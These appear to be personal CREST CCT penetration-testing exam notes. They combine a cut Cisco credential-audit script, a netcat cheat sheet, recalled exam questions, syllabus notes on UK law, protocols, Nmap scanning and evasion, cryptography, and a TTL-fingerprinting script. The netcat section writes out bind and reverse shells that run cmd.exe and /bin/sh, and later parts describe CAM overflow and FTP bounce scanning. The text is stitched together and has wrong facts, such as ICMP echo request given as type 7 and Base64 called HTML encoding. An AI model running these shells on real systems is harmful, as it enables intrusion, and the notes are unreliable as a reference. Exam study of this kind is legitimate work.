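    (service password-encryption off), so it is reported as type 0.
    """
    m = CRED_LINE.match(line)
    if not m:
        return None
    enable, user, keyword, type_digit, _value = m.groups()
    stype = 0 if type_digit is None else int(type_digit)
    note, severity = TYPE_INFO.get(stype, ("unrecognised type", "review"))
    return {
        "scope": "enable" if enable else f"username:{user}",
        "keyword": keyword,
        "type": stype,
        "severity": severity,
        "note": note,
    }


def remediation(finding: dict) -> str:
    """Suggest the scrypt (type 9) form for a weak entry.

    The enable form is the one shown in the notes; the username form is
    assumed to follow the same algorithm-type syntax.
    """
    if finding["scope"] == "enable":
        return "enable algorithm-type scrypt secret <new-password>"
    name = finding["scope"].split(":", 1)[1]
    return f"username {name} algorithm-type scrypt secret <new-password>"


def audit_config(config: str) -> dict:
    """Walk a running-config and summarise how every credential is stored."""
    findings = []
    pw_encryption = False
    for line in config.splitlines():
        if line.strip() == "service password-encryption":
            pw_encryption = True
            continue
        finding = classify(line)
        if finding:
            if finding["severity"] in ("critical", "high"):
                finding["fix"] = remediation(finding)
            findings.append(finding)
    return {
        "service_password_encryption": pw_encryption,
        "findings": findings,
        "weak": [f for f in findings if "fix" in f],
    }


# Constructed sample; service password-encryption is deliberately absent so a
# clear-text username password survives alongside an older type 7 entry.
SAMPLE_CONFIG = """\
hostname R1
enable secret 5 $1$iUjJ$cDZ03KKGh7mHfX2RSbDqP
username jdoe password 7 07362E590E1B1C041B1E124C0A2F2E206832752E1A01134D
username ops privilege 15 secret 9 $9$WnArItcQHW/uuE$x5WTLbu7PbzGDuv0fSwGKS/KURsy5a3WCQckmJp0MbE
username legacy password 0 cisco123
interface GigabitEthernet0/0
"""

if __name__ == "__main__":
    report = audit_config(SAMPLE_CONFIG)
    print("service password-encryption:", report["service_password_encryption"])
    for f in report["findings"]:
        print(f'{f["scope"]:18} type {f["type"]}  {f["severity"]:8} {f["note"]}')
        if "fix" in f:
            print("    ->", f["fix"])
```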
Netcat Configuration
Transferring a File – (Output is Input…)
nc -l -p 4444 >output.txt # Receiving End
nc <IP Address> port < input.txt # Sending End
nc -l -p 1234 > out.file # Receiving End
nc -w 3 [destination] 1234 < out.file # Sending End
Set up a Netcat Bind Shell (Windows)
nc -l -p 4444 -e cmd.exe
nc <IP Address> 4444 # Connect to the shell
Set up a Netcat Bind Shell (Linux)
nc -l -p 4444 -e /bin/sh
nc <IP Address> 4444 # Connect to the shell
Set up a Netcat Reverse Shell (Windows)
The compromised host connects to me, where I have my -l listener ready. The -e runs on the compromised host, not on my
local machine, hence a reverse shell.
nc -l -p 443 # Attacker listening for connection
nc <IP Address> 443 -e cmd.exe
-v verbose
-l listen
-p port
-n suppress name/port resolution
-e execute
-w timeout - has no effect on the -l option. The default is no timeout.
nc -v -L -e cmd.exe -p 139 -s xxx.xxx.xxx.xxx
 The -s binds "in front of" some services that may already be listening on those ports (but will shut that port
down).
 Use of | - Pipe takes the output of one command and makes it usable for a following command. Output from
the left-hand command is passed directly to the input for the command on the right-hand side of the pipe.
Example: cat ./somefile | grep cool - Takes the output of somefile and make it available for grep, and
then grep will print all lines with the word cool in it.
 Hence in netcat case on receiving side it’ll be on left hand side after which pipe right hand side can process
it, such as: nc -l -p 1234 | uncompress -c | tar xvfp -
 On sending side it’ll have to be on right hand side with left hand side being the element which manipulates
the file, such as: tar cfp - /some/dir | compress -c | nc -w 3 [destination] 1234
The type command will display the command name's path, or other information (such as alias):
$ type cp
cp is /bin/cp
$ type unknown
unknown not found
$ type type
type is a shell builtin
Password Combinations
An 8-character password drawn from the 26 lower-case letters and 10 digits gives 36^8 = 2821109907456
combinations (verified on a calculator).
Web Testing App Proxy Configurations
 Client Side Certificates: When testing with a client side certificate (often used for authentication purposes),
it needs to be installed on the testing proxy server (Client Certificate in Burp's User Options/SSL, Options/SSL
menu fails to load upon restore if client certificate, Options / SSL / Client SSL Certificates, Usage of
Certificates)
 Thick Clients: If the application in question is sending HTTP traffic, it is possible to intercept it using Burp
with its invisible proxy option under proxy listeners. Echo Mirage and Canape are similar tools which are
designed for thick clients.
 Can also use tcpdump or Wireshark if the traffic is non-HTTP, such as FTP.
UNION Statement
The UNION operator is used to combine the result-set of two or more SELECT statements.
 Each SELECT statement within UNION must have the same number of columns (balanced?)
 The columns must also have similar data types
 The columns in each SELECT statement must also be in the same order
SELECT City FROM Customers
UNION
SELECT City FROM Suppliers
ORDER BY City;
In the above example Customer and Suppliers are the tables, and City is the column. Based on UNION syntax you
cannot have for example:
SELECT City, PostalCode FROM Customers
UNION
SELECT City FROM Suppliers
ORDER BY City;
TTY
"tty" originally meant "teletype" and "pty" means "pseudo-teletype". In UNIX, /dev/tty* is any device that acts like a
"teletype", i.e. a terminal. (Called teletype because that's what we had terminals for.)
A tty command in Linux and other Unix-like operating systems is a shell command that can be entered interactively
or as part of a script to determine whether the output for the script is a terminal (that is, to an interactive user) or to
some other destination such as another program or a printer.
Password Only Login Prompt
One suspects it’s a Cisco switch.
Windows LSASS
Local Security Authority Subsystem Service (LSASS) is a process in Microsoft Windows operating systems that is
responsible for enforcing the security policy on the system. It verifies users logging on to a Windows computer or
server, handles password changes, and creates access tokens.
Notes:
 What is Oracle and PL SQL? - In Oracle database management, PL/SQL is a procedural language extension to
Structured Query Language (SQL). The purpose of PL/SQL is to combine database language and procedural
programming language.
 STP:
To add from passing exam:
 PING with record-route – which header is updated – I put IP header
 ARP – WHO HAS broadcast
 DNS Zone transfer port (TCP 53)
 .NET machine.config – Input Validation
 Unix password management – list of crypto algorithms – asks which one not used – selected MD4
 TCP initial sequence – get no reply from a TCP connection
 ECB encryption
 TCP 2301? – Which OS? (MacOS listed also…)
 Netcat file transfer – only logical one was using type file.txt | nc targethost – from notes this makes no
sense, but was only one it could have been?
 Netcat -u for UDP port listening?
 MS tracert uses ICMP and UNIX Traceroute uses UDP – confirm?
 In traceroute how do you know the host has been reached – Host will send port unreachable
 NFS share with root squash – lists 3 files with various UID and GID’s (some 0 for root?) – asks which one can
be changed by messing about…
 MS SQL – output of string which it says is password – asks which field has salt, but not as separated by $ so
makes no sense?
 Well configured Checkpoint FW on same LAN, will it respond to layer 2 ARP?
 Get port numbers of Real Time Protocol – RTP
 Tried to confuse you – REMOVE – it is not a valid HTTP method.
 What is SSL downgrade attack?
 You download webpage – so its HTML over HTTP over SSL
 Organisation element of MAC address – first 2 bytes, 4 bytes?
 Where is SA password stored, in Master DB – which table? Does MS SQL use .. for example master..syslogin?
 TCP wrapper – Permit and Deny file names?
 Msbin1 encoding – used for what, plaintext?
Linux /opt folder with PDF listing. HTTP parameter set to it to browse - Linux host and possible directory
traversal attacks...
ESP is part of IPsec, which runs on UDP 500. A packet sent to it will elicit a UDP response of nothing... you
put it'll get a TCP response...
HTTP request smuggling
Parameters should only be in POST, not GET?
sip configuration file, sip referer header?
(2) Client side certificate being issued, then configured for proxy for web app testing?
.net machine.config
.net input validation

CREST CCT Exam Prep Notes

  • 1. Appendix A: Soft Skills and Assessment Management A1 - Engagement Lifecycle  Benefits and utility of penetration testing to the client.  Structure of penetration testing, including the relevant processes and procedures.  Concepts of infrastructure testing and application testing, including black box and white box formats.  Project closure and debrief A2 - Law & Compliance Knowledge of pertinent UK legal issues:  Computer Misuse Act 1990 Unauthorised access is key term. It means you need permission. Under the Computer Misuse Act 1990, the following are offences:  Unauthorised access to computer material (section 1);  Unauthorised access with intent to commit or facilitate commission of further offences (section 2); and  Unauthorised modification of computer material (section 3). These offences are potentially wide in scope: even guessing the password to access someone else's webmail account could be prosecuted as an offence of unauthorised access to computer material. When companies commission penetration testing, a contract should be signed before testing begins, to ensure that the testing company's actions are authorised. It should also deal with liability issues: what happens if the tester takes down a critical part of the organisation's website and the organisation suffers loss? Ensure you do not go out of scope (follow redirects?). The Act was amended by The Police and Justice Act 2006, which increased the penalties.  Human Rights Act 1998 Everyone has the right to respect for his private and family life, his home and his correspondence. There shall be no interference by a public authority with the exercise of this right except such as is in accordance with the law and is necessary in a democratic society in the interests of national security, public safety or the economic well-being of the country, for the prevention of disorder or crime, for the protection of health or morals, or for the protection of the rights and freedoms of others. 
 Data Protection Act 1998 Section 55 – Unlawful obtaining of personal data. This section makes it an offence for people (Other Parties), such as hackers and impersonators, outside the organisation to obtain unauthorised access to the personal data. Ensure you do not keep any records that would fall under the act for longer than is necessary - i.e. prove it is accessible and do not back up those records. Data controllers may want to employ you to test they have appropriate measures in place to secure the data.
  • 2.  Police and Justice Act 2006  Makes amendments to the Computer Misuse Act 1990  Increased penalties of Computer Misuse Act. (Makes unauthorized computer access serious enough to fall under extradition)  Made it illegal to perform DOS attacks. Denial of Service attacks - Such attacks are illegal. They were banned in Scotland in 2007 and in England and Wales in 2008 when section 3 of the Computer Misuse Act was amended (by the Police and Justice Act 2006).  Made it illegal to supply and own hacking tools. Impact of this legislation on penetration testing activities. Awareness of sector-specific regulatory issues.
  • 3. Appendix B: Core Technical Skills B1 - IP Protocols LITA – Link Layer, Internet Layer, Transport Layer, Application Layer Traceroute  Traceroute tracks the route packets have taken from an IP network on their way to a given host. It utilizes the IP protocol's time to live (TTL) field and attempts to elicit an ICMP TIME_EXCEEDED response from each gateway along the path to the host.  We start our probes with a TTL of one and increase by one until we get an “ICMP port unreachable" (or TCP reset), which means we got to the "host", or hit a max (which defaults to 30 hops)  We don't want the destination host to process the UDP probe packets, so the destination port is set to an unlikely value (you can change it with the -p flag). There is no such a problem for ICMP or TCP tracerouting (for TCP we use half-open technique, which prevents our probes to be seen by applications on the destination host).  Probe packets are UDP datagrams with so-called "unlikely" destination ports. The "unlikely" port of the first probe is 33434, then for each next probe it is incremented by one. Since the ports are expected to be unused, the destination host normally returns "ICMP port unreachable " as a final response.  Can also use -I ICMP which uses icmp echo packets for probes, or -T tcp (using half-open technique), uses the constant destination port (default is 80, http) TTL  See OS Fingerprinting below. The time-to-live (TTL) is the number of hops that a packet is permitted to travel before being discarded by a router.  The TTL is set in an eight binary digit field in the packet header by the sending host and is used to prevent packets from endlessly circulating on the Internet or other network.  When forwarding an IP packet, routers are required to decrease the TTL by at least one (to prevent routing loops). If a packet's TTL field reaches zero, the router detecting it discards the packet and sends an ICMP message back to the originating host - TTL expired in transit. 
 The ping and the traceroute utilities both make use of the TTL. The latter intentionally sends packets with low TTL values so that they will be discarded by each successive router in the destination path. The time between sending a packet and receiving the ICMP message that it was discarded is used to calculate the travel time for each successive hop.  A specific TTL number can indicate the maximum range for a packet. For example, zero restricts it to the same host, one to the same subnet, 32 to the same site, 64 to the same region and 128 to the same continent; 255 is unrestricted.  Default TLL Values Linux 64 FreeBSD 64 Windows 128 Cisco 255 IPv4  IPv4 is a connectionless protocol for use on packet-switched networks. It operates on a best effort delivery model, in that it does not guarantee delivery, nor does it assure proper sequencing or avoidance of duplicate delivery.  IPv4 uses 32-bit addresses which limits the address space to 4294967296 (232) addresses.  IPv4 reserves special address blocks for private networks (~18 million addresses) and multicast addresses (~270 million addresses).
  • 4. IPv6  IPv6 uses a 128-bit address, theoretically allowing 2128 , or approximately 3.4×1038 addresses. The actual number is slightly smaller, as multiple ranges are reserved for special use or completely excluded from use. The total number of possible IPv6 addresses is more than 7.9×1028 times as many as IPv4, which uses 32-bit addresses and provides approximately 4.3 billion addresses. The two protocols are not designed to be interoperable, complicating the transition to IPv6. However, several IPv6 transition mechanisms have been devised to permit communication between IPv4 and IPv6 hosts.  Research has shown that the use of fragmentation can be leveraged to evade network security controls. As a result, RFC 7112 requires that the first fragment of an IPv6 packet contains the entire IPv6 header chain, such that some very pathological fragmentation cases are forbidden. TCP  65535 TCP ports  TCP provides reliable, ordered, and error-checked delivery of a stream of octets (bytes) between applications running on hosts communicating by an IP network. Major Internet applications such as the World Wide Web, email, remote administration, and file transfer rely on TCP.  Scanning: Vanilla: SYN, SYN/ACK, ACK, Port Closed: SYN, RST/ACK, Half Open: SYN, SYN/ACK, RST Inverse TCP Scanning  Stealth Scanning – Use malformed TCP requests because responses are only sent back by closed ports.  RFC 793 – If a port is closed, an RST/ACK packet should be sent to close the connection (an open port will not respond (but it will with SYN ACK?), hence if no response then port is open or server is down). MS systems disregard RFC 793, so it only works against *nix systems.  Attacker can send:  A FIN TCP packet  An XMAS probe with the FIN, URG, and PUSH TCP flags sent  A NULL probe with no TCP flags set FTP Bounce Scanning – FTP Port  Kind of like an old SSRF. There is a flaw in the way some FTP servers handle the PORT command. 
 Once logged into the server, enter passive mode (QUOTE PASV), after which a PORT command is issued telling the FTP service to connect to a specific port on a target server (PORT 144,51,17,230,0,23 will attempt to connect to 144.51.17.230 port 23), followed by a LIST command. If a 226 response is received then the target host is open; if 425 then the connection has been refused.
UDP
 Applications that do not require a reliable data stream service may use the User Datagram Protocol (UDP), which provides a connectionless datagram service that emphasises reduced latency over reliability.
 With UDP, computer applications can send messages, in this case referred to as datagrams, to other hosts on an Internet Protocol (IP) network. Prior communications are not required in order to set up communication channels or data paths.
 UDP uses a simple connectionless communication model with a minimum of protocol mechanism. UDP provides checksums for data integrity, and port numbers for addressing different functions at the source and destination of the datagram. It has no handshaking dialogues, and thus exposes the user's program to any unreliability of the underlying network; there is no guarantee of delivery, ordering, or duplicate protection.
 Scanning: since UDP is connectionless, you only have two options. Send a probe to all 65535 ports and wait for ICMP destination port unreachable messages to identify ports which are not accessible, or send specific application requests (SNMP, dig, TFTP) and await a response (these responses are processed by the application and not the TCP/IP stack).
 Port open: UDP probe packet – no response.
 Port closed: UDP probe packet – host would send ICMP Destination Port Unreachable. This negative scanning allows you to infer which ports are open (as they don't send messages).
nmap -sU
ICMP
 The Internet Control Message Protocol (ICMP) is a supporting protocol in the Internet protocol suite.
 The ICMP header starts after the IPv4 header and is identified by IP protocol number 1. All ICMP packets have an 8-byte header and a variable-sized data section. The first 4 bytes of the header have a fixed format, while the last 4 bytes depend on the type/code of that ICMP packet.
 Type/code 0/0 is ping reply, 5/1 is host redirect.
 Useful ICMP messages:
 o Echo Request – ping packet (Type 7, Type 0 is reply)
 o Timestamp Request – in decimal format representing time elapsed since midnight GMT (Type 13, 14 is reply)
 o Information Request (Type 15) – RARP, BOOTP, DHCP
 o Subnet Address Mask Request (Type 17, Type 18 is reply)
 o Parameter Problem (Type 12)
 o Time Exceeded (Type 11)
 o Redirect (Type 5)
 o Source Quench (Type 4)
 o Destination Unreachable (Type 3)
Awareness that other IP protocols exist.
B2 - Network Architectures
Varying network types that could be encountered during a penetration test:
CAT 5 / Fibre
 Category 5 cable, commonly referred to as Cat 5, is a twisted pair cable for computer networks. The cable standard provides performance of up to 100 MHz and is suitable for most varieties of Ethernet over twisted pair. Cat 5 is also used to carry other signals such as telephony and video.
 Optical fibre uses light rather than electricity as the means of transmitting signals. Light is the fastest mode of transmitting information, which suits businesses with a need for speed, and because fibre optic cabling carries a much cleaner signal than conventional copper cabling, it is able to transmit signals faster than ever before.
10/100/1000baseT
 Definition of 10/100 Ethernet: an Ethernet network transmitting at 10 and 100 Mbps. Very old computers are limited to 10 Mbps, and most computers support 10/100 or 10/100/1000 (Gigabit Ethernet).
 1000Base-T is a type of gigabit Ethernet networking technology that uses copper cables as a medium. 1000Base-T uses four pairs of Category 5 unshielded twisted pair cable to achieve gigabit data rates. The standard is designated as IEEE 802.3ab and allows 1 Gbps data transfers for distances of up to 330 feet.
 Fast Ethernet is a collective term for a number of Ethernet standards that carry traffic at the nominal rate of 100 Mbit/s (the earlier Ethernet speed was 10 Mbit/s). Of the Fast Ethernet standards, 100BASE-TX is by far the most common.
Token ring
 Token Ring local area network (LAN) technology is a communications protocol for local area networks. It uses a special three-byte frame called a "token" that travels around a logical "ring" of workstations or servers. This token passing is a channel access method providing fair access for all stations and eliminating the collisions of contention-based access methods.
Wireless (802.11)
 IEEE 802.11 is a set of media access control (MAC) and physical layer (PHY) specifications for implementing wireless local area network (WLAN) computer communication in the 900 MHz and 2.4, 3.6, 5, and 60 GHz frequency bands.
Security implications of shared media, switched media and VLANs.
 Collision domain: a set of LAN devices whose frames could collide with one another.
 Broadcast domain: a broadcast domain can also be seen as a collision domain. It can be defined as a set of devices such that when one device sends a broadcast frame, all other devices in the same broadcast domain will receive that frame.
 Hub: works at L1 of the OSI model. Only one data packet can pass through the hub at a time. A lot of collisions are present, because there is only one collision domain.
 Switch: supports simultaneous connections. It sends traffic to the destination port. This is done because of a feature known as ARP (Address Resolution Protocol), whose main job is to convert an IP address to a MAC address. Access switches or L2 switches operate at L2 (data link layer), on source MAC and destination MAC.
 Routers: work at L3 of the OSI model. Routers don't propagate broadcast traffic; two different subnets/LANs/networks communicate through a router via routing protocols. Routers can take and forward "unicast" traffic. Each interface present on a router gives rise to a broadcast domain.
 Bridges and hubs = 1 broadcast domain and 1 collision domain.
 Switch = 1 broadcast domain per VLAN and 1 collision domain per port.
 Routers = 1 broadcast domain and 1 collision domain per port.
CAM Table Overflow
 Ethernet switches use Content Addressable Memory (CAM) tables to map MAC addresses and VLAN assignments to individual ports, so that network frames are delivered correctly. The macof utility can be used to flood a switch with random Ethernet frames, resulting in a CAM overflow.
 The switch will fail open and broadcast frames to all ports (becoming a hub).
B3 - Network Routing
RIP
 The Routing Information Protocol (RIP) is one of the oldest distance-vector routing protocols, which employ the hop count as a routing metric. RIP prevents routing loops by implementing a limit on the number of hops allowed in a path from source to destination. The largest number of hops allowed for RIP is 15, which limits the size of networks that RIP can support.
 In RIPv1 routers broadcast updates with their routing table every 30 seconds. UDP 520.
 The hop count 1 denotes a network that is directly connected to the router. 16 hops denote a network that is unreachable, according to the RIP hop limit.
 Due to the deficiencies of the original RIP specification, RIP version 2 (RIPv2) was developed in 1993 and last standardised in 1998 in RFC 2453. It included the ability to carry subnet information, thus supporting Classless Inter-Domain Routing (CIDR). To maintain backward compatibility, the hop count limit of 15 remained.
OSPF
 Open Shortest Path First (OSPF) uses a link state routing (LSR) algorithm and falls into the group of interior gateway protocols (IGPs), operating within a single autonomous system (AS). OSPF supports the Classless Inter-Domain Routing (CIDR) addressing model. OSPF is a widely used IGP in large enterprise networks.
IGRP
 Interior Gateway Routing Protocol (IGRP) is a distance vector interior gateway protocol (IGP) developed by Cisco. It is used by routers to exchange routing data within an autonomous system. IGRP is a proprietary protocol.
 IGRP was created in part to overcome the limitations of RIP (maximum hop count of only 15, and a single routing metric) when used within large networks. IGRP supports multiple metrics for each route, including bandwidth, delay, load, and reliability; to compare two routes these metrics are combined into a single metric, using a formula which can be adjusted through the use of pre-set constants. The maximum configurable hop count of IGRP-routed packets is 255 (default 100), and routing updates are broadcast every 90 seconds (by default). IGRP uses protocol number 9 for communication.
 IGRP is considered a classful routing protocol. Because the protocol has no field for a subnet mask, the router assumes that all subnetwork addresses within the same Class A, Class B, or Class C network have the same subnet mask as the subnet mask configured for the interfaces in question. This contrasts with classless routing protocols that can use variable length subnet masks. Classful protocols have become less popular as they are wasteful of IP address space.
EIGRP
 Enhanced Interior Gateway Routing Protocol (EIGRP) is an advanced distance-vector routing protocol that is used on a computer network for automating routing decisions and configuration. The protocol was designed by Cisco Systems as a proprietary protocol, available only on Cisco routers.
 Partial functionality of EIGRP was converted to an open standard in 2013 and was published with informational status as RFC 7868 in 2016.
 EIGRP is used on a router to share routes with other routers within the same autonomous system. Unlike other well-known routing protocols, such as RIP, EIGRP only sends incremental updates, reducing the workload on the router and the amount of data that needs to be transmitted.
 EIGRP replaced the Interior Gateway Routing Protocol (IGRP) in 1993. One of the major reasons for this was the change to classless IPv4 addresses in the Internet Protocol, which IGRP could not support.
B4 - Network Mapping & Target Identification
Analysis of output from tools used to map the route between the engagement point and a number of targets.
Traceroute to port
traceroute -T -p 80 x.x.x.x
 -p 80 is the port; you sometimes get a different route to 443.
nping --tr, --traceroute
 Traceroute mode (can only be used with TCP/UDP/ICMP modes).
Nmap
 -sn (-sP) – no port scan after host discovery
 -Pn – no ping (treat all hosts as online)
Windows tracert
 The TRACERT diagnostic utility determines the route to a destination by sending Internet Control Message Protocol (ICMP) echo packets to the destination. In these packets, TRACERT uses varying IP Time-To-Live (TTL) values. Because each router along the path is required to decrement the packet's TTL by at least 1 before forwarding the packet, the TTL is effectively a hop counter. When the TTL on a packet reaches zero (0), the router sends an ICMP "Time Exceeded" message back to the source computer. (Contrast ICMP message with traceroute – same?)
Linux traceroute – see above.
Network sweeping techniques to prioritise a target list and the potential for false negatives.
 Ping sweep?
 As RPC uses high ephemeral ports, some port scanners incorrectly identify the open port as a different service if they only identify services via port number. You can eliminate this by using nmap's -sR flag.
B6 - Filtering Avoidance Techniques
The importance of egress and ingress filtering, including the risks associated with outbound connections.
 Egress filtering is a basic principle that should be implemented at every organisation to prevent hacking activity from leaving your network.
 We always do ingress filtering. That is, we only allow trusted and known traffic into the firewall from the internet. This traffic is typically allowed into a DMZ, and then traffic from the DMZ is allowed through to the internal network. This traffic is allowed only from selected IP addresses and specific ports. Everything else is blocked.
B7 - Packet Crafting
Packet crafting to meet a particular requirement: modifying source ports, spoofing source (S) IP addresses, manipulating TTLs, fragmentation.
Nmap [1]
FIREWALL/IDS EVASION AND SPOOFING:
 -f; --mtu <val>: fragment packets (optionally w/given MTU)
 -S <IP_Address>: Spoof source address
 -g/--source-port <portnum>: Use given port number
 --ttl <val>: Set IP time-to-live field
 -D <decoy1,decoy2[,ME],...>: Cloak a scan with decoys
Scan types and options:
 -sS TCP SYN scan
 -sT TCP Connect scan
 -sU UDP scan
 -sV Version detection
 -sA TCP ACK port scan
 -sP: No port scan
 -p Port ranges, e.g. -p U:53,111,137,T:21-25,80,139,8080 (exam tried to confuse with -p0)
 -Pn No ping (exam tried to confuse with -p0, lower vs upper case P)
 -sn Host discovery only – no port scanning
Nmap Proxy Chaining
 Create a proxy via SSH to scan from your client to a target located on a network which the SSH server can access. The command below will create a tunnel starting at port 9050 on my local host to the target machine, 192.168.217.144.
 The -N and -f indicate that I do not want to run a command and want to fork into the background. I chose port 9050 because it is the default port for the proxychains tool.
ssh username@192.168.217.144 -D 9050 -N -f
 Now that the tunnel is set up I can scan the internal network looking for webservers:
proxychains nmap -n -sT -p 80 192.168.217.0/24
[1] https://nmap.org/book/man-briefoptions.html
Generating ICMP packets
 Ping generates ICMP. Nmap does it with more options:
nmap -sP -PE scanme.nmap.org
 -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
Ping Broadcast
 The last octet is reserved as the broadcast address, which is used to send traffic to all hosts within a subnet.
ping -b 10.10.5.255
 You can also send a broadcast to other subnets:
ping -b 255.255.255.255
B8 - OS Fingerprinting
Remote operating system fingerprinting; active and passive techniques.
OS DETECTION:
 -O: Enable OS detection
 --osscan-limit: Limit OS detection to promising targets
 --osscan-guess: Guess OS more aggressively
 Active fingerprinting works by sending packets to a target and analysing the packets that are sent back.
 Passive fingerprinting sniffs TCP/IP ports, rather than generating network traffic by sending packets to them. Hence, it's a more effective way of avoiding detection or being stopped by a firewall. While sniffing traffic, passive fingerprinting does its best to determine a target machine's OS by analysing the initial Time to Live (TTL) in packet IP headers, and the TCP window size in the first packet of a TCP session, which is usually either a SYN (synchronize) or SYN/ACK (synchronize and acknowledge) packet.
 Understanding TTL to map OS: 123 is near 128, which is the Windows default, so it is likely a Windows host which is 5 hops away, as each hop reduces the TTL (https://subinsb.com/default-device-ttl-values).
 When used in ping, the TTL of the remote host is returned. In the example below for theguardian.co.uk, ping returns a TTL of 60 (Linux default: 64/255).
Pinging theguardian.co.uk [151.101.0.233] with 32 bytes of data:
Reply from 151.101.0.233: bytes=32 time=15ms TTL=60
 ...when we trace to the same host we see it is 5 hops, but the first hop does not count as it is from localhost to the router and the TTL only decrements from the router. Hence 4 hops are added to the 60 we have, giving a TTL of 64, meaning a Unix host.
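The TTL reasoning above, as an added example (not code from the original notes): it reads TTL values out of ping output, picks the nearest default initial TTL from the notes' table, and applies the notes' traceroute cross-check. The ping lines are constructed sample output.

```python
"""Passive OS and hop-count estimate from the TTL seen in ping replies.
Added example for these notes (not code from the original): the initial-TTL
table is the one the notes give, and the ping output below is constructed
sample text, not a real capture."""
from __future__ import annotations
import re

# Initial (default) TTLs from the notes, keyed by the value the sender starts with.
INITIAL_TTLS = {64: "Linux / FreeBSD (Unix-like)", 128: "Windows", 255: "Cisco / network device"}

TTL_RE = re.compile(r"\bTTL=(\d+)\b", re.IGNORECASE)


def infer_origin(observed_ttl: int) -> tuple[int, int, str]:
    """Return (initial_ttl, hops, os_guess) for a TTL seen in a reply.

    Every router decrements by at least one, so the sender's initial TTL is the
    smallest default that is still >= the observed value; hops = initial - observed.
    Caveat: a reply that has travelled very far (e.g. observed 30) is ambiguous
    between a 64-start host 34 hops away and a rarer 32-start host; this picks
    the table entry, so treat the guess as a hint, not a verdict."""
    if not 0 < observed_ttl <= 255:
        raise ValueError(f"TTL out of range: {observed_ttl}")
    for initial in sorted(INITIAL_TTLS):
        if observed_ttl <= initial:
            return initial, initial - observed_ttl, INITIAL_TTLS[initial]
    raise AssertionError("unreachable: 255 covers every valid TTL")


def consistent_with_traceroute(observed_ttl: int, traceroute_hops: int) -> bool:
    """Apply the notes' cross-check: traceroute's first hop (localhost to router) is
    not counted, so observed + (hops - 1) should land on a known initial TTL."""
    return observed_ttl + (traceroute_hops - 1) in INITIAL_TTLS


def analyse_ping(output: str) -> list[dict]:
    """Pull every TTL= out of Windows- or Linux-style ping output and classify it."""
    results = []
    for line in output.splitlines():
        m = TTL_RE.search(line)
        if not m:
            continue
        observed = int(m.group(1))
        initial, hops, guess = infer_origin(observed)
        results.append({"observed": observed, "initial": initial, "hops": hops, "guess": guess})
    return results


# Constructed sample output modelled on the notes' two examples.
SAMPLE_PING = """\
Reply from 151.101.0.233: bytes=32 time=15ms TTL=60
64 bytes from 10.0.0.5: icmp_seq=1 ttl=123 time=2.1 ms
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
"""

if __name__ == "__main__":
    for r in analyse_ping(SAMPLE_PING):
        print(f"TTL={r['observed']:<3} start={r['initial']:<3} hops={r['hops']:<2} -> {r['guess']}")
```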
ping -4 localhost # -4 forces IPv4 usage
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
B9 - Application Fingerprinting and Evaluating Unknown Services
Determining server types and network application versions from application banners.
 WTF…
Evaluation of responsive but unknown network applications.
 More WTF…
B10 - Network Access Control Analysis
Reviewing firewall rule bases and network access control lists.
 OK, whatever… the final rule has to be drop all: ANY ANY DENY/DROP
B11 - Cryptography
Differences between encryption and encoding.
 Encoding transforms data into another format using a scheme that is publicly available, so that it can easily be reversed. Encoding is for maintaining data usability and uses schemes that are publicly available.
 Encoding is the process of transforming data so that it may be transmitted without danger over a communication channel or stored without danger on a storage medium. For instance, computer hardware does not manipulate text, it merely manipulates bytes, so a text encoding is a description of how text should be transformed into bytes.
HTML Encoding
 Base32/64 are examples of HTML encoding.
 To display an HTML page correctly, a web browser must know which character set (character encoding) to use. ASCII was the first character encoding standard (also called character set). ASCII defined 128 different alphanumeric characters that could be used on the internet. ANSI (Windows-1252) was the original Windows character set, with support for 256 different character codes. ISO-8859-1 was the default character set for HTML 4. This character set also supported 256 different character codes. Because ANSI and ISO-8859-1 were so limited, HTML 4 also supported UTF-8. UTF-8 (Unicode) covers almost all of the characters and symbols in the world. The default character encoding for HTML5 is UTF-8.
<meta charset="UTF-8">
 Similarly, HTTP does not allow all characters to be transmitted safely, so it may be necessary to encode data using base64 (uses only letters, numbers and two safe characters) or other encoding schemes such as HTMLEncode.
 When encoding or decoding, the emphasis is placed on everyone having the same algorithm, and that algorithm is usually well-documented, widely distributed and fairly easily implemented. Anyone is eventually able to decode encoded data.
 Base64 is a form of HTML encoding. Base32 is a valid transfer encoder, but not useful due to its limited character set.
 It uses a 32-character set comprising the twenty-six upper-case letters A–Z and the digits 2–7.
 IIS HTMLEncode converts characters as follows:
 o The less-than character (<) is converted to &lt;
 o The ampersand character (&) is converted to &amp;
Symmetric / asymmetric encryption
Private (Secret) Key / Public Key
 Symmetry means two things are the same. In cryptography it refers to the key, which is used both to encrypt and to decrypt the plain text.
 Public key cryptography uses different keys to encrypt and decrypt. It uses key pairs. Each user gets two keys, a public key for the public and a private key which is kept secret. Anything which is encrypted with one key from that pair can be decrypted with the other key from that pair. Keys must be from the same pair. It is slower but provides manageable key counts for large organisations.
Block cipher and cipher block chaining (CBC)
 A block cipher is a method of encrypting text (to produce ciphertext) in which a cryptographic key and algorithm are applied to a block of data (for example, 64 contiguous bits) at once as a group rather than to one bit at a time. The main alternative method, used much less frequently, is called the stream cipher.
 Cipher block chaining (CBC) is a mode of operation for a block cipher where the ciphertext of the previous block impacts the next block. It uses a chaining mechanism that causes the decryption of a block of ciphertext to depend
on all the preceding ciphertext blocks. As a result, the entire validity of all preceding blocks is contained in the immediately previous ciphertext block. A single bit error in a ciphertext block affects the decryption of all subsequent blocks. Rearrangement of the order of the ciphertext blocks causes decryption to become corrupted.
Encryption algorithms: DES, 3DES, AES, RSA, RC4.
 DES - The Data Encryption Standard (DES) is a symmetric-key algorithm for the encryption of electronic data. DES is now considered to be insecure for many applications. This is mainly due to the 56-bit key size being too small.
 3DES - Triple DES (3DES), officially the Triple Data Encryption Algorithm (TDEA or Triple DEA), is a symmetric-key block cipher, which applies the DES cipher algorithm three times to each data block. Key sizes 168, 112 or 56 bits (keying options 1, 2, 3 respectively) (multiples of 56).
 AES - Advanced Encryption Standard (AES), also known by its original name Rijndael, is a specification for the encryption of electronic data established by the U.S. National Institute of Standards and Technology (NIST) in 2001. AES is a subset of the Rijndael cipher developed by two Belgian cryptographers. It supersedes the Data Encryption Standard (DES), which was published in 1977. The algorithm described by AES is a symmetric-key algorithm. Keys: 128, 192 and 256 bits (multiples of 64).
